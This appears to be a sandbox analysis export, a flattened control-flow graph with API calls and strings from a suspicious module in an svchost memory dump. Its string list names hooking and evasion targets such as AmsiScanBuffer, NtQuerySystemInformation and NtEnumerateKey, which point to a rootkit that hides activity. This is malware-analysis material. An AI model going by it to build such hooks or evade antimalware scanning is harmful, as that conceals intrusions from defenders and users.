GetOEMCP 7992->7993 7993->7962 7995 158709dc5d0 7993->7995 7994->7993 7996 158709dc61b 7995->7996 8000 158709dc5df _invalid_parameter_noinfo 7995->8000 7997 158709dd1f4 __std_exception_copy 13 API calls 7996->7997 7999 158709dc619 7997->7999 7998 158709dc602 HeapAlloc 7998->7999 7998->8000 7999->7960 7999->7963 8000->7996 8000->7998 8001 158709db470 _invalid_parameter_noinfo 2 API calls 8000->8001 8001->8000 8003 158709de22c 16 API calls 8002->8003 8004 158709de91b 8003->8004 8006 158709de958 IsValidCodePage 8004->8006 8010 158709dea71 8004->8010 8012 158709de972 8004->8012 8005 158709d8070 _invalid_parameter_noinfo 8 API calls 8007 158709de6a9 8005->8007 8008 158709de969 8006->8008 8006->8010 8007->7966 8007->7971 8009 158709de998 GetCPInfo 8008->8009 8008->8012 8009->8010 8009->8012 8010->8005 8045 158709de344 8012->8045 8143 158709dc558 EnterCriticalSection 8013->8143 8030 158709ddd97 8029->8030 8031 158709ddd9c 8029->8031 8030->7991 8030->7992 8031->8030 8032 158709dcab0 _invalid_parameter_noinfo 14 API calls 8031->8032 8033 158709dddb7 8032->8033 8037 158709dffb4 8033->8037 8038 158709dddda 8037->8038 8039 158709dffc9 8037->8039 8041 158709e0020 8038->8041 8039->8038 8040 158709e0a40 _invalid_parameter_noinfo 14 API calls 8039->8040 8040->8038 8042 158709e0035 8041->8042 8043 158709e0048 8041->8043 8042->8043 8044 158709de8c4 _invalid_parameter_noinfo 14 API calls 8042->8044 8043->8030 8044->8043 8046 158709de38f GetCPInfo 8045->8046 8047 158709de485 8045->8047 8046->8047 8053 158709de3a2 8046->8053 8048 158709d8070 _invalid_parameter_noinfo 8 API calls 8047->8048 8049 158709de524 8048->8049 8049->8010 8056 158709e1474 8053->8056 8057 158709ddd78 14 API calls 8056->8057 8058 158709e14b6 8057->8058 8076 158709dec58 8058->8076 8077 158709dec61 MultiByteToWideChar 8076->8077 8148 158709dbe9a 8144->8148 8149 158709dbec1 8144->8149 8145 158709dbeea 8146 158709dd2a0 __free_lconv_num 13 API calls 8145->8146 8146->8148 8147 158709dd2a0 __free_lconv_num 13 API calls 8147->8149 8148->7942 8149->8145 8149->8147 8552 158709d2ab4 TlsGetValue TlsGetValue TlsGetValue 8553 158709d2b0d 8552->8553 8557 158709d2b79 8552->8557 8555 158709d2b15 8553->8555 8553->8557 8554 158709d2b74 8555->8554 8556 158709d2c32 TlsSetValue TlsSetValue TlsSetValue 8555->8556 8558 158709d3f88 StrCmpNIW 8555->8558 8556->8554 8557->8554 8557->8556 8559 158709d3f88 StrCmpNIW 8557->8559 8558->8555 8559->8557 8976 158709d6430 8977 158709d643d 8976->8977 8978 158709d6449 8977->8978 8980 158709d655a 8977->8980 8979 158709d64cd 8978->8979 8981 158709d64a6 SetThreadContext 8978->8981 8982 158709d6581 VirtualProtect FlushInstructionCache 8980->8982 8984 158709d663e 8980->8984 8981->8979 8982->8980 8983 158709d665e 8985 158709d5530 3 API calls 8983->8985 8984->8983 8986 158709d4b20 VirtualFree 8984->8986 8989 158709d6663 8985->8989 8986->8983 8987 158709d66b7 8990 158709d8070 _invalid_parameter_noinfo 8 API calls 8987->8990 8988 158709d6677 ResumeThread 8988->8989 8989->8987 8989->8988 8991 158709d66ff 8990->8991 8992 158709dec30 GetCommandLineA GetCommandLineW 8560 158709daaac 8561 158709daad9 __except_validate_context_record 8560->8561 8562 158709d9324 __CxxCallCatchBlock 9 API calls 8561->8562 8563 158709daade 8562->8563 8566 158709dabc6 8563->8566 8567 158709dab38 8563->8567 8575 158709dab8c 8563->8575 8564 158709dac34 8564->8575 8602 158709da22c 8564->8602 8571 158709dabe5 8566->8571 8596 158709d99cc 8566->8596 8568 158709dabb3 8567->8568 8574 158709dab5a __GetCurrentState 8567->8574 8567->8575 8589 158709d95d0 8568->8589 8571->8564 8571->8575 8599 158709d99e0 8571->8599 8572 158709dacdd 8574->8572 8577 158709dafb8 8574->8577 8578 158709d99cc Is_bad_exception_allowed 9 API calls 8577->8578 8579 158709dafe7 __GetCurrentState 8578->8579 8580 158709d9324 __CxxCallCatchBlock 9 API calls 8579->8580 8586 158709db004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8580->8586 8581 158709db0fb 8582 158709d9324 __CxxCallCatchBlock 9 API calls 8581->8582 8583 158709db100 8582->8583 8584 158709d9324 __CxxCallCatchBlock 9 API calls 8583->8584 8585 158709db10b __FrameHandler3::GetHandlerSearchState 8583->8585 8584->8585 8585->8575 8586->8581 8586->8585 8587 158709d99cc 9 API calls Is_bad_exception_allowed 8586->8587 8659 158709d99f4 8586->8659 8587->8586 8662 158709d9634 8589->8662 8591 158709d95ef __FrameHandler3::FrameUnwindToEmptyState 8666 158709d9540 8591->8666 8594 158709dafb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8595 158709d9624 8594->8595 8595->8575 8597 158709d9324 __CxxCallCatchBlock 9 API calls 8596->8597 8598 158709d99d5 8597->8598 8598->8571 8600 158709d9324 __CxxCallCatchBlock 9 API calls 8599->8600 8601 158709d99e9 8600->8601 8601->8564 8670 158709db144 8602->8670 8604 158709da6f4 8605 158709da373 8606 158709da645 8605->8606 8650 158709da3ab 8605->8650 8606->8604 8607 158709da643 8606->8607 8723 158709da6fc 8606->8723 8608 158709d9324 __CxxCallCatchBlock 9 API calls 8607->8608 8610 158709da687 8608->8610 8610->8604 8615 158709d8070 _invalid_parameter_noinfo 8 API calls 8610->8615 8611 158709da575 8611->8607 8616 158709da592 8611->8616 8618 158709d99cc Is_bad_exception_allowed 9 API calls 8611->8618 8612 158709d9324 __CxxCallCatchBlock 9 API calls 8614 158709da2da 8612->8614 8614->8610 8619 158709d9324 __CxxCallCatchBlock 9 API calls 8614->8619 8617 158709da69a 8615->8617 8616->8607 8622 158709da5b4 8616->8622 8716 158709d95a4 8616->8716 8617->8575 8618->8616 8621 158709da2ea 8619->8621 8623 158709d9324 __CxxCallCatchBlock 9 API calls 8621->8623 8622->8607 8624 158709da6d7 8622->8624 8625 158709da5ca 8622->8625 8626 158709da2f3 8623->8626 8627 158709d9324 __CxxCallCatchBlock 9 API calls 8624->8627 8629 158709da5d5 8625->8629 8630 158709d99cc Is_bad_exception_allowed 9 API calls 8625->8630 8681 158709d9a0c 8626->8681 8631 158709da6dd 8627->8631 8634 158709db1dc 9 API calls 8629->8634 8630->8629 8633 158709d9324 __CxxCallCatchBlock 9 API calls 8631->8633 8636 158709da6e6 8633->8636 8637 158709da5eb 8634->8637 8635 158709d99e0 9 API calls 8635->8650 8639 158709dc2f4 14 API calls 8636->8639 8637->8607 8641 158709d9634 __GetUnwindTryBlock RtlLookupFunctionEntry 8637->8641 8638 158709d9324 __CxxCallCatchBlock 9 API calls 8640 158709da335 8638->8640 8639->8604 8640->8605 8643 158709d9324 __CxxCallCatchBlock 9 API calls 8640->8643 8642 158709da605 8641->8642 8720 158709d9838 RtlUnwindEx 8642->8720 8645 158709da341 8643->8645 8646 158709d9324 __CxxCallCatchBlock 9 API calls 8645->8646 8648 158709da34a 8646->8648 8684 158709db1dc 8648->8684 8650->8611 8650->8635 8695 158709da96c 8650->8695 8709 158709da158 8650->8709 8653 158709da35e 8691 158709db2cc 8653->8691 8655 158709da6d1 8656 158709dc2f4 14 API calls 8655->8656 8656->8624 8657 158709da366 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8657->8655 8735 158709d9178 8657->8735 8660 158709d9324 __CxxCallCatchBlock 9 API calls 8659->8660 8661 158709d9a02 8660->8661 8661->8586 8663 158709d9662 __FrameHandler3::FrameUnwindToEmptyState 8662->8663 8664 158709d968c RtlLookupFunctionEntry 8663->8664 8665 158709d96d4 8663->8665 8664->8663 8665->8591 8667 158709d9560 8666->8667 8668 158709d958b 8666->8668 8667->8668 8669 158709d9324 __CxxCallCatchBlock 9 API calls 8667->8669 8668->8594 8669->8667 8671 158709db169 __FrameHandler3::FrameUnwindToEmptyState 8670->8671 8672 158709d9634 __GetUnwindTryBlock RtlLookupFunctionEntry 8671->8672 8673 158709db17e 8672->8673 8740 158709d9db4 8673->8740 8676 158709db190 __FrameHandler3::GetHandlerSearchState 8743 158709d9dec 8676->8743 8677 158709db1b3 8678 158709d9db4 __GetUnwindTryBlock RtlLookupFunctionEntry 8677->8678 8679 158709da28e 8678->8679 8679->8604 8679->8605 8679->8612 8682 158709d9324 __CxxCallCatchBlock 9 API calls 8681->8682 8683 158709d9a1a 8682->8683 8683->8604 8683->8638 8686 158709db2c3 8684->8686 8690 158709db207 8684->8690 8685 158709da35a 8685->8605 8685->8653 8687 158709d99e0 9 API calls 8687->8690 8688 158709d99cc Is_bad_exception_allowed 9 API calls 8688->8690 8689 158709da96c 9 API calls 8689->8690 8690->8685 8690->8687 8690->8688 8690->8689 8692 158709db339 8691->8692 8694 158709db2e9 Is_bad_exception_allowed 8691->8694 8692->8657 8693 158709d99cc 9 API calls Is_bad_exception_allowed 8693->8694 8694->8692 8694->8693 8696 158709da999 8695->8696 8708 158709daa28 8695->8708 8697 158709d99cc Is_bad_exception_allowed 9 API calls 8696->8697 8698 158709da9a2 8697->8698 8699 158709d99cc Is_bad_exception_allowed 9 API calls 8698->8699 8700 158709da9bb 8698->8700 8698->8708 8699->8700 8701 158709da9e7 8700->8701 8702 158709d99cc Is_bad_exception_allowed 9 API calls 8700->8702 8700->8708 8703 158709d99e0 9 API calls 8701->8703 8702->8701 8704 158709da9fb 8703->8704 8705 158709d99cc Is_bad_exception_allowed 9 API calls 8704->8705 8706 158709daa14 8704->8706 8704->8708 8705->8706 8707 158709d99e0 9 API calls 8706->8707 8707->8708 8708->8650 8710 158709d9634 __GetUnwindTryBlock RtlLookupFunctionEntry 8709->8710 8711 158709da195 8710->8711 8712 158709d99cc Is_bad_exception_allowed 9 API calls 8711->8712 8713 158709da1cd 8712->8713 8714 158709d9838 9 API calls 8713->8714 8715 158709da211 8714->8715 8715->8650 8717 158709d95b8 __FrameHandler3::FrameUnwindToEmptyState 8716->8717 8718 158709d9540 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8717->8718 8719 158709d95c2 8718->8719 8719->8622 8721 158709d8070 _invalid_parameter_noinfo 8 API calls 8720->8721 8722 158709d9932 8721->8722 8722->8607 8724 158709da735 8723->8724 8729 158709da948 8723->8729 8725 158709d9324 __CxxCallCatchBlock 9 API calls 8724->8725 8726 158709da73a 8725->8726 8727 158709da759 EncodePointer 8726->8727 8733 158709da7ac 8726->8733 8728 158709d9324 __CxxCallCatchBlock 9 API calls 8727->8728 8730 158709da769 8728->8730 8729->8607 8730->8733 8746 158709d94ec 8730->8746 8732 158709d99cc 9 API calls Is_bad_exception_allowed 8732->8733 8733->8729 8733->8732 8734 158709da158 19 API calls 8733->8734 8734->8733 8736 158709d9197 8735->8736 8737 158709d91c0 RtlPcToFileHeader 8736->8737 8738 158709d91e2 RaiseException 8736->8738 8739 158709d91d8 8737->8739 8738->8655 8739->8738 8741 158709d9634 __GetUnwindTryBlock RtlLookupFunctionEntry 8740->8741 8742 158709d9dc7 8741->8742 8742->8676 8742->8677 8744 158709d9634 __GetUnwindTryBlock RtlLookupFunctionEntry 8743->8744 8745 158709d9e06 8744->8745 8745->8679 8747 158709d9324 __CxxCallCatchBlock 9 API calls 8746->8747 8748 158709d9518 8747->8748 8748->8733 8993 158709dc828 8994 158709dc842 8993->8994 8995 158709dc82d 8993->8995 8999 158709dc848 8995->8999 9000 158709dc892 8999->9000 9001 158709dc88a 8999->9001 9003 158709dd2a0 __free_lconv_num 13 API calls 9000->9003 9002 158709dd2a0 __free_lconv_num 13 API calls 9001->9002 9002->9000 9004 158709dc89f 9003->9004 9005 158709dd2a0 __free_lconv_num 13 API calls 9004->9005 9006 158709dc8ac 9005->9006 9007 158709dd2a0 __free_lconv_num 13 API calls 9006->9007 9008 158709dc8b9 9007->9008 9009 158709dd2a0 __free_lconv_num 13 API calls 9008->9009 9010 158709dc8c6 9009->9010 9011 158709dd2a0 __free_lconv_num 13 API calls 9010->9011 9012 158709dc8d3 9011->9012 9013 158709dd2a0 __free_lconv_num 13 API calls 9012->9013 9014 158709dc8e0 9013->9014 9015 158709dd2a0 __free_lconv_num 13 API calls 9014->9015 9016 158709dc8ed 9015->9016 9017 158709dd2a0 __free_lconv_num 13 API calls 9016->9017 9018 158709dc8fd 9017->9018 9019 158709dd2a0 __free_lconv_num 13 API calls 9018->9019 9020 158709dc90d 9019->9020 9025 158709dc6f8 9020->9025 9039 158709dc558 EnterCriticalSection 9025->9039 9230 158709d33a8 9231 158709d33cf 9230->9231 9232 158709d349c 9231->9232 9233 158709d33ec PdhGetCounterInfoW 9231->9233 9233->9232 9234 158709d340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 9233->9234 9235 158709d3440 StrCmpW 9234->9235 9236 158709d3488 GetProcessHeap HeapFree 9234->9236 9235->9236 9238 158709d3455 9235->9238 9236->9232 9237 158709d3950 12 API calls 9237->9238 9238->9236 9238->9237 9239 158709e0fa8 9240 158709e0fcc 9239->9240 9241 158709d8070 _invalid_parameter_noinfo 8 API calls 9240->9241 9242 158709e100e 9241->9242 8153 158709d4320 8154 158709d426d 8153->8154 8155 158709d42bd VirtualQuery 8154->8155 8156 158709d42d7 8154->8156 8157 158709d4322 GetLastError 8154->8157 8155->8154 8155->8156 8157->8154 9041 158709df820 9044 158709df7d8 9041->9044 9049 158709dc558 EnterCriticalSection 9044->9049 9050 158709dfe20 9051 158709dfe4a 9050->9051 9052 158709dd220 _invalid_parameter_noinfo 13 API calls 9051->9052 9053 158709dfe6a 9052->9053 9054 158709dd2a0 __free_lconv_num 13 API calls 9053->9054 9055 158709dfe78 9054->9055 9056 158709dfea2 9055->9056 9057 158709dd220 _invalid_parameter_noinfo 13 API calls 9055->9057 9058 158709dfec1 InitializeCriticalSectionEx 9056->9058 9061 158709dfeab 9056->9061 9059 158709dfe94 9057->9059 9058->9056 9060 158709dd2a0 __free_lconv_num 13 API calls 9059->9060 9060->9056 9243 158709e479d 9246 158709daf34 9243->9246 9247 158709daf4e 9246->9247 9249 158709daf9b 9246->9249 9248 158709d9324 __CxxCallCatchBlock 9 API calls 9247->9248 9247->9249 9248->9249 8158 158709d2518 GetProcessIdOfThread GetCurrentProcessId 8159 158709d2543 CreateFileW 8158->8159 8160 158709d25be 8158->8160 8159->8160 8161 158709d2577 WriteFile ReadFile CloseHandle 8159->8161 8161->8160 9062 158709dc218 9063 158709dd2a0 __free_lconv_num 13 API calls 9062->9063 9064 158709dc228 9063->9064 9065 158709dd2a0 __free_lconv_num 13 API calls 9064->9065 9066 158709dc23c 9065->9066 9067 158709dd2a0 __free_lconv_num 13 API calls 9066->9067 9068 158709dc250 9067->9068 9069 158709dd2a0 __free_lconv_num 13 API calls 9068->9069 9070 158709dc264 9069->9070 9250 158709e1398 9251 158709e13ae 9250->9251 9252 158709e13f5 9251->9252 9254 158709e140e 9251->9254 9253 158709dd1f4 __std_exception_copy 13 API calls 9252->9253 9255 158709e13fa 9253->9255 9256 158709ddd78 14 API calls 9254->9256 9258 158709e1405 9254->9258 9257 158709dd04c _invalid_parameter_noinfo 38 API calls 9255->9257 9256->9258 9257->9258 8772 158709db0d4 8779 158709db007 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8772->8779 8773 158709db0fb 8774 158709d9324 __CxxCallCatchBlock 9 API calls 8773->8774 8775 158709db100 8774->8775 8776 158709d9324 __CxxCallCatchBlock 9 API calls 8775->8776 8777 158709db10b __FrameHandler3::GetHandlerSearchState 8775->8777 8776->8777 8778 158709d99cc 9 API calls Is_bad_exception_allowed 8778->8779 8779->8773 8779->8777 8779->8778 8780 158709d99f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8779->8780 8780->8779 9071 158709d2e54 9073 158709d2ea8 9071->9073 9072 158709d2ec3 9073->9072 9075 158709d37f4 9073->9075 9076 158709d388a 9075->9076 9078 158709d3819 9075->9078 9076->9072 9077 158709d3f88 StrCmpNIW 9077->9078 9078->9076 9078->9077 9079 158709d1e08 StrCmpIW StrCmpW 9078->9079 9079->9078 9259 158709e19d0 9260 158709de864 56 API calls 9259->9260 9261 158709e19d9 9260->9261 8162 158709e494f 8163 158709e495e 8162->8163 8164 158709e4968 8162->8164 8166 158709dc5ac LeaveCriticalSection 8163->8166 9080 158709d824c 9081 158709d8270 __scrt_release_startup_lock 9080->9081 9082 158709db581 9081->9082 9083 158709dcb10 __std_exception_copy 13 API calls 9081->9083 9084 158709db5aa 9083->9084 9262 158709d5fcc 9263 158709d5fd3 9262->9263 9264 158709d6000 VirtualProtect 9263->9264 9265 158709d5f10 9263->9265 9264->9265 9266 158709d6029 GetLastError 9264->9266 9266->9265 8167 158709dad48 8168 158709d9324 __CxxCallCatchBlock 9 API calls 8167->8168 8169 158709dad7d 8168->8169 8170 158709d9324 __CxxCallCatchBlock 9 API calls 8169->8170 8171 158709dad8b __except_validate_context_record 8170->8171 8172 158709d9324 __CxxCallCatchBlock 9 API calls 8171->8172 8173 158709dadcf 8172->8173 8174 158709d9324 __CxxCallCatchBlock 9 API calls 8173->8174 8175 158709dadd8 8174->8175 8176 158709d9324 __CxxCallCatchBlock 9 API calls 8175->8176 8177 158709dade1 8176->8177 8190 158709d993c 8177->8190 8180 158709d9324 __CxxCallCatchBlock 9 API calls 8181 158709dae11 __CxxCallCatchBlock 8180->8181 8197 158709d9978 8181->8197 8183 158709daeeb __CxxCallCatchBlock 8184 158709d9324 __CxxCallCatchBlock 9 API calls 8183->8184 8185 158709daefe 8184->8185 8186 158709d9324 __CxxCallCatchBlock 9 API calls 8185->8186 8188 158709daf07 8186->8188 8191 158709d9324 __CxxCallCatchBlock 9 API calls 8190->8191 8192 158709d994d 8191->8192 8193 158709d9324 __CxxCallCatchBlock 9 API calls 8192->8193 8194 158709d9958 8192->8194 8193->8194 8195 158709d9324 __CxxCallCatchBlock 9 API calls 8194->8195 8196 158709d9969 8195->8196 8196->8180 8196->8181 8198 158709d9324 __CxxCallCatchBlock 9 API calls 8197->8198 8199 158709d998a 8198->8199 8200 158709d9324 __CxxCallCatchBlock 9 API calls 8199->8200 8201 158709d99c5 8199->8201 8202 158709d9995 8200->8202 8202->8201 8203 158709d9324 __CxxCallCatchBlock 9 API calls 8202->8203 8204 158709d99b6 8203->8204 8204->8183 8205 158709d8ff8 8204->8205 8206 158709d9324 __CxxCallCatchBlock 9 API calls 8205->8206 8207 158709d9006 8206->8207 8207->8183 9085 158709e4848 9088 158709d904c 9085->9088 9089 158709d9064 9088->9089 9090 158709d9076 9088->9090 9089->9090 9092 158709d906c 9089->9092 9091 158709d9324 __CxxCallCatchBlock 9 API calls 9090->9091 9093 158709d907b 9091->9093 9094 158709d9324 __CxxCallCatchBlock 9 API calls 9092->9094 9095 158709d9074 9092->9095 9093->9095 9096 158709d9324 __CxxCallCatchBlock 9 API calls 9093->9096 9097 158709d909b 9094->9097 9096->9095 9098 158709d9324 __CxxCallCatchBlock 9 API calls 9097->9098 9099 158709d90a8 9098->9099 9100 158709dc2f4 14 API calls 9099->9100 9101 158709d90b1 9100->9101 9102 158709dc2f4 14 API calls 9101->9102 9103 158709d90bd 9102->9103 7454 158709d1bc4 7461 158709d1724 GetProcessHeap HeapAlloc 7454->7461 7456 158709d1bda SleepEx 7457 158709d1724 50 API calls 7456->7457 7459 158709d1bd3 7457->7459 7459->7456 7460 158709d159c StrCmpIW StrCmpW 7459->7460 7512 158709d19b0 7459->7512 7460->7459 7529 158709d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7461->7529 7463 158709d174c 7530 158709d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7463->7530 7465 158709d1754 7531 158709d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7465->7531 7467 158709d175d 7532 158709d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7467->7532 7469 158709d1766 7533 158709d1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7469->7533 7471 158709d176f 7534 158709d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7471->7534 7473 158709d1778 7535 158709d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7473->7535 7475 158709d1781 7536 158709d1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7475->7536 7477 158709d178a RegOpenKeyExW 7478 158709d19a2 7477->7478 7479 158709d17bc RegOpenKeyExW 7477->7479 7478->7459 7480 158709d17e5 7479->7480 7481 158709d17fb RegOpenKeyExW 7479->7481 7537 158709d12b8 RegQueryInfoKeyW 7480->7537 7483 158709d1836 RegOpenKeyExW 7481->7483 7484 158709d181f 7481->7484 7487 158709d1871 RegOpenKeyExW 7483->7487 7488 158709d185a 7483->7488 7546 158709d104c RegQueryInfoKeyW 7484->7546 7489 158709d1895 7487->7489 7490 158709d18ac RegOpenKeyExW 7487->7490 7492 158709d12b8 16 API calls 7488->7492 7494 158709d12b8 16 API calls 7489->7494 7495 158709d18e7 RegOpenKeyExW 7490->7495 7496 158709d18d0 7490->7496 7493 158709d1867 RegCloseKey 7492->7493 7493->7487 7497 158709d18a2 RegCloseKey 7494->7497 7499 158709d1922 RegOpenKeyExW 7495->7499 7500 158709d190b 7495->7500 7498 158709d12b8 16 API calls 7496->7498 7497->7490 7501 158709d18dd RegCloseKey 7498->7501 7503 158709d1946 7499->7503 7504 158709d195d RegOpenKeyExW 7499->7504 7502 158709d104c 6 API calls 7500->7502 7501->7495 7507 158709d1918 RegCloseKey 7502->7507 7508 158709d104c 6 API calls 7503->7508 7505 158709d1981 7504->7505 7506 158709d1998 RegCloseKey 7504->7506 7510 158709d104c 6 API calls 7505->7510 7506->7478 7507->7499 7509 158709d1953 RegCloseKey 7508->7509 7509->7504 7511 158709d198e RegCloseKey 7510->7511 7511->7506 7556 158709d14a0 7512->7556 7529->7463 7530->7465 7531->7467 7532->7469 7533->7471 7534->7473 7535->7475 7536->7477 7538 158709d1486 RegCloseKey 7537->7538 7539 158709d1323 GetProcessHeap HeapAlloc 7537->7539 7538->7481 7540 158709d1472 GetProcessHeap HeapFree 7539->7540 7541 158709d134e RegEnumValueW 7539->7541 7540->7538 7542 158709d13a1 7541->7542 7542->7540 7542->7541 7544 158709d13cf GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7542->7544 7545 158709d141a lstrlenW GetProcessHeap HeapAlloc StrCpyW 7542->7545 7551 158709d1530 7542->7551 7544->7545 7545->7542 7547 158709d11b5 RegCloseKey 7546->7547 7548 158709d10bf 7546->7548 7547->7483 7548->7547 7549 158709d10cf RegEnumValueW 7548->7549 7550 158709d114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7548->7550 7549->7548 7550->7548 7552 158709d154a 7551->7552 7555 158709d1580 7551->7555 7553 158709d1561 StrCmpIW 7552->7553 7554 158709d1569 StrCmpW 7552->7554 7552->7555 7553->7552 7554->7552 7555->7542 7557 158709d14e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7556->7557 7558 158709d14c2 GetProcessHeap HeapFree 7556->7558 7558->7557 7558->7558 9267 158709e47c2 9268 158709d9978 __CxxCallCatchBlock 9 API calls 9267->9268 9274 158709e47d5 9268->9274 9269 158709d9324 __CxxCallCatchBlock 9 API calls 9270 158709e4828 9269->9270 9271 158709d9324 __CxxCallCatchBlock 9 API calls 9270->9271 9273 158709e4838 9271->9273 9272 158709d8ff8 __CxxCallCatchBlock 9 API calls 9275 158709e4814 __CxxCallCatchBlock 9272->9275 9274->9272 9274->9275 9275->9269 9276 158709d81c0 9277 158709d81c9 __scrt_release_startup_lock 9276->9277 9279 158709d81cd 9277->9279 9280 158709dbbb4 9277->9280 9281 158709dbbd4 9280->9281 9291 158709dbbed 9280->9291 9282 158709dbbf2 9281->9282 9283 158709dbbdc 9281->9283 9285 158709de864 56 API calls 9282->9285 9284 158709dd1f4 __std_exception_copy 13 API calls 9283->9284 9287 158709dbbe1 9284->9287 9286 158709dbbf7 9285->9286 9309 158709ddf38 GetModuleFileNameW 9286->9309 9289 158709dd04c _invalid_parameter_noinfo 38 API calls 9287->9289 9289->9291 9291->9279 9294 158709dbb54 13 API calls 9295 158709dbc61 9294->9295 9296 158709dbc69 9295->9296 9297 158709dbc7a 9295->9297 9298 158709dd1f4 __std_exception_copy 13 API calls 9296->9298 9299 158709db994 14 API calls 9297->9299 9308 158709dbc6e 9298->9308 9301 158709dbc96 9299->9301 9300 158709dd2a0 __free_lconv_num 13 API calls 9300->9291 9302 158709dbcc6 9301->9302 9303 158709dbcdf 9301->9303 9301->9308 9304 158709dd2a0 __free_lconv_num 13 API calls 9302->9304 9306 158709dd2a0 __free_lconv_num 13 API calls 9303->9306 9305 158709dbccf 9304->9305 9307 158709dd2a0 __free_lconv_num 13 API calls 9305->9307 9306->9308 9307->9291 9308->9300 9310 158709ddf91 9309->9310 9311 158709ddf7d GetLastError 9309->9311 9313 158709ddd78 14 API calls 9310->9313 9312 158709dd184 13 API calls 9311->9312 9314 158709ddf8a 9312->9314 9315 158709ddfbf 9313->9315 9317 158709d8070 _invalid_parameter_noinfo 8 API calls 9314->9317 9316 158709df198 9 API calls 9315->9316 9319 158709ddfd0 9315->9319 9316->9319 9318 158709dbc0e 9317->9318 9321 158709db994 9318->9321 9327 158709dde1c 9319->9327 9323 158709db9d2 9321->9323 9325 158709dba38 9323->9325 9341 158709dec1c 9323->9341 9324 158709dbb25 9324->9294 9325->9324 9326 158709dec1c 14 API calls 9325->9326 9326->9325 9328 158709dde5b 9327->9328 9330 158709dde40 9327->9330 9329 158709dde60 9328->9329 9331 158709dece8 WideCharToMultiByte 9328->9331 9329->9330 9334 158709dd1f4 __std_exception_copy 13 API calls 9329->9334 9330->9314 9332 158709ddeb7 9331->9332 9332->9329 9333 158709ddebe GetLastError 9332->9333 9336 158709ddee9 9332->9336 9335 158709dd184 13 API calls 9333->9335 9334->9330 9337 158709ddecb 9335->9337 9338 158709dece8 WideCharToMultiByte 9336->9338 9339 158709dd1f4 __std_exception_copy 13 API calls 9337->9339 9340 158709ddf10 9338->9340 9339->9330 9340->9330 9340->9333 9342 158709deba8 9341->9342 9343 158709ddd78 14 API calls 9342->9343 9344 158709debcc 9343->9344 9344->9323 8208 158709dff40 8209 158709dff4b 8208->8209 8217 158709e2c24 8209->8217 8230 158709dc558 EnterCriticalSection 8217->8230 9104 158709df440 GetProcessHeap 9105 158709dae42 9106 158709d9324 __CxxCallCatchBlock 9 API calls 9105->9106 9108 158709dae4f __CxxCallCatchBlock 9106->9108 9107 158709dae93 RaiseException 9109 158709daeba 9107->9109 9108->9107 9110 158709d9978 __CxxCallCatchBlock 9 API calls 9109->9110 9111 158709daec2 9110->9111 9116 158709d8ff8 __CxxCallCatchBlock 9 API calls 9111->9116 9117 158709daeeb __CxxCallCatchBlock 9111->9117 9112 158709d9324 __CxxCallCatchBlock 9 API calls 9113 158709daefe 9112->9113 9114 158709d9324 __CxxCallCatchBlock 9 API calls 9113->9114 9115 158709daf07 9114->9115 9116->9117 9117->9112 7559 158709d1e3c LoadLibraryA GetProcAddress 7560 158709d1e62 SleepEx 7559->7560 7561 158709d1e6f 7559->7561 7560->7560 8784 158709d34b8 8785 158709d34e8 8784->8785 8786 158709d35a1 8785->8786 8787 158709d3505 PdhGetCounterInfoW 8785->8787 8787->8786 8788 158709d3523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 8787->8788 8789 158709d3555 StrCmpW 8788->8789 8790 158709d358d GetProcessHeap HeapFree 8788->8790 8789->8790 8791 158709d356a 8789->8791 8790->8786 8791->8790 8793 158709d3950 StrCmpNW 8791->8793 8794 158709d39f2 8793->8794 8795 158709d3982 StrStrW 8793->8795 8794->8791 8795->8794 8796 158709d399b StrToIntW 8795->8796 8796->8794 8797 158709d39c3 8796->8797 8797->8794 8803 158709d1a30 OpenProcess 8797->8803 8800 158709d3f88 StrCmpNIW 8801 158709d39e4 8800->8801 8801->8794 8802 158709d1cfc 2 API calls 8801->8802 8802->8794 8804 158709d1a64 K32GetModuleFileNameExW 8803->8804 8805 158709d1ab6 8803->8805 8806 158709d1aad CloseHandle 8804->8806 8807 158709d1a7e PathFindFileNameW lstrlenW 8804->8807 8805->8794 8805->8800 8806->8805 8807->8806 8808 158709d1a9c StrCpyW 8807->8808 8808->8806

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000002B.00000002.2703479718.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                  • Associated: 0000002B.00000002.2702128258.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2705112262.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2706222016.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2707597947.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 0000002B.00000002.2708951728.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_43_2_158709d0000_svchost.jbxd
                                  Similarity
                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                  • API String ID: 1735320900-4225371247
